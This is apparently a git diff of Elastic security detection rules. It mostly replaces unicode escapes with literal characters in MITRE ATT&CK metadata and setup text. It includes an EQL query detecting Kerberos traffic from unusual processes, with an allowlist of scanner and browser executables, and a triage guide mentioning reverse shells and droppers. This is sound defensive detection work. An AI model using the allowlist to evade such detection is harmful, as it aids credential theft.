+++ b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_101.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_102.json b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_102.json index 58b40eb0ecc..0b3af52efe9 100644 --- a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_102.json +++ b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_102.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_102.json b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_102.json index 0b19799c98d..cdb781f2923 100644 --- a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_102.json @@ -52,7 +52,7 @@ ], "risk_score": 21, "rule_id": "88817a33-60d3-411f-ba79-7c905d865b2a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", 
@@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_103.json b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_103.json index 2a4acf5e242..f3f1858f75a 100644 --- a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_103.json @@ -52,7 +52,7 @@ ], "risk_score": 21, "rule_id": "88817a33-60d3-411f-ba79-7c905d865b2a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_104.json b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_104.json index 308da8dbfc6..8c498475dd4 100644 --- a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_104.json @@ -52,7 +52,7 @@ ], "risk_score": 21, "rule_id": "88817a33-60d3-411f-ba79-7c905d865b2a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_105.json b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_105.json index 013f0cf54f8..2e3a59fe0a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_105.json 
@@ -51,7 +51,7 @@ ], "risk_score": 21, "rule_id": "88817a33-60d3-411f-ba79-7c905d865b2a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_106.json b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_106.json index 4b1f586a4e9..caf09930efa 100644 --- a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_106.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_1.json b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_1.json index f2aa683a515..e9155b007f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_1.json +++ b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_1.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -69,7 +69,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_103.json b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_103.json index 9e6a5ac4bef..e7e4faa7b30 100644 --- a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_103.json +++ b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_103.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_104.json b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_104.json index e7b2992de64..55cdb791303 100644 --- a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_104.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_2.json b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_2.json index 5cd89480024..0628445de05 100644 --- a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_2.json +++ b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_2.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_103.json b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_103.json index ff262007fdc..de77f4246c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_103.json 
@@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_104.json b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_104.json index 0c5515ddaa5..1347c4b9544 100644 --- a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_104.json 
@@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_105.json b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_105.json index bf3e9727472..4e4784b8d1e 100644 --- a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_105.json 
@@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_106.json b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_106.json index 9141cf17fcb..8e3e4956440 100644 --- a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_106.json 
@@ -62,7 +62,7 @@ ], "risk_score": 21, "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_104.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_104.json index a2fb9ef0b35..6deaf53015c 100644 --- a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_104.json +++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_104.json 
@@ -16,8 +16,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Kerberos Traffic from Unusual Process", - "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. 
HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port \u003e= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port 
Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. 
HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port 
Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", "related_integrations": [ { "package": "endpoint", @@ -72,7 +72,7 @@ ], "risk_score": 47, "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_105.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_105.json index 24eef96a671..083d92e69ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_105.json +++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_105.json 
